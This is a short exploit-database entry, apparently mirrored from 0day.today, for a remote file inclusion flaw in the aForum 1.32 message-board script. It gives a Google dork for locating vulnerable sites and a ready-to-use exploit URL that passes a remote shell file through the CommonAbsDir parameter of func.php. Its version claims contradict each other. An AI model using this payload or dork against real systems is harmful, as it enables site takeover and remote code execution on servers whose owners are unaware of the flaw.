id: 1852
date: 05/08/2007
title: aForum <= 1.32 (CommonAbsDir) Remote File Inclusion Vulnerability
author: ThE TiGeR
cves: 

=================================================================
aForum <= 1.32 (CommonAbsDir) Remote File Inclusion Vulnerability
=================================================================


#AForum =>1.33 Remote file inclusion (Func.php)

#Download Script : http://www.agner.org/software/msgbrd2/aforum.zip

#D0rk:allintitle:List of messageboards

#Exploit :

#http://localhost/[aforum_path]/common/func.php?CommonAbsDir=shell.txt?

#Discovered By : ThE TiGeR

#Greetz : Reda, ™~${{BraveHeart}}$~™




#  0day.today [2023-03-26]  #